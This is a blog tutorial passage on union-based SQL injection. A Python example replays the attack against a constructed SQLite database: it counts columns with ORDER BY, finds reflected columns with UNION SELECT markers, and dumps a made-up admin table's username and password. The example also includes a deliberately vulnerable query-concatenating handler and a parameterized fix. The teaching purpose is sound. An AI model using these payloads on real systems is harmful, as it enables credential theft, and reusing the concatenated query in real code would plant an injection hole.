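<span style="font-size: small;">The whole procedure from the union-based tutorial above and from this post (balancing, ORDER BY with a visible error and with only the page content changing, making the legitimate row disappear with a negative id or with <b>and 0</b>, and reading data through a reflected column), replayed as an added Python example against an in-memory SQLite database. This is not code from the original posts: news_row() is a constructed stand-in for a news.php that concatenates ?id= into its query, news_row_safe() is its hardened form, render_page() is a constructed template that prints only the title and body, and the news and admin tables hold made-up rows. SQLite stands in for MySQL, so <b>||</b> replaces concat() and the information_schema step is left out.</span><br />

```python
"""Added example, not from the original posts: the union-based walk-through
replayed against an in-memory SQLite database. news_row() is a constructed
stand-in for news.php that pastes ?id= into its SQL; news_row_safe() is the
hardened form. Table contents are made up."""
import re
import sqlite3

QUERY = "SELECT id, title, body, author, posted FROM news WHERE id="


def make_db():
    # Constructed sample data; table and column names follow the posts.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
        INSERT INTO news VALUES (11, 'Hello', 'First post', 'rai', '2015-05-01');
        CREATE TABLE admin(id INTEGER, username TEXT, pass TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret');
    """)
    return con


def news_row(con, user_id, show_errors=True):
    """Vulnerable handler: the raw id parameter becomes part of the SQL text.
    show_errors=False mimics the Part-2 target, where the database error is
    hidden and only the page content changes."""
    try:
        return con.execute(QUERY + user_id).fetchall(), None
    except sqlite3.Error as e:
        return [], (str(e) if show_errors else None)


def news_row_safe(con, user_id):
    """Hardened handler: id is validated and bound, never spliced into SQL."""
    try:
        article_id = int(user_id)
    except ValueError:
        return [], None  # not a number: behaves like 'no such article'
    return con.execute(QUERY + "?", (article_id,)).fetchall(), None


def render_page(rows, err):
    """Constructed template: it prints only title and body (columns 2 and 3)."""
    if err:
        return f"<pre>{err}</pre>"
    if not rows:
        return "<header>No such article</header>"
    _, title, body, *_ = rows[0]
    return f"<header>{title}</header><section>{body}</section>"


def page(con, param, show_errors=True):
    """What the visitor sees for news.php?id=<param>."""
    return render_page(*news_row(con, param, show_errors))


def count_columns(con, base="11", show_errors=True):
    """ORDER BY n with growing n until the page stops matching the baseline:
    an error page when errors are shown, missing content when they are not."""
    baseline = page(con, base, show_errors)
    n = 1
    while page(con, f"{base} ORDER BY {n}-- ", show_errors) == baseline:
        n += 1
    return n - 1


def reflected_columns(con, ncols):
    """UNION a row of distinct markers; the markers that show up on the page
    are the printable columns. id=-11 matches no news row, so only our row
    is rendered (the '-' trick). String markers avoid false hits on digits."""
    markers = ",".join(f"'mk{i}'" for i in range(1, ncols + 1))
    html = page(con, f"-11 UNION SELECT {markers}-- ")
    return [int(m) for m in re.findall(r"mk(\d+)", html)]


def dump_admin(con, ncols, col, prefix="-11"):
    """Read the admin table through one reflected column. prefix='11 and 0'
    is the Part-2 way of suppressing the legitimate row; '||' is SQLite's
    concatenation, the MySQL query would use concat(username,0x3a,pass)."""
    fields = [f"'mk{i}'" for i in range(1, ncols + 1)]
    fields[col - 1] = "username || ':' || pass"
    html = page(con, f"{prefix} UNION SELECT {','.join(fields)} FROM admin-- ")
    return re.search(r"<section>(.*?)</section>", html).group(1)


if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)                 # 5, found through the error page
    cols = reflected_columns(db, n)       # [2, 3]
    print(n, cols, dump_admin(db, n, cols[-1]))
    print(page(db, "11' "), "|", news_row_safe(db, "11' "))
```

<span style="font-size: small;">count_columns() gives the same answer whether the target shows the MySQL error or silently drops the content, which is the point of this post: the oracle is "does the page still look like the baseline", not "is there an error". The hardened handler returns an empty result for every payload above because the id never becomes SQL text; that, and not a WAF signature, is the fix.</span><br />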
<span style="font-size: small;"><br /></span>
<span class="post-description" style="font-size: small; text-align: justify;"><b>Author : Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com1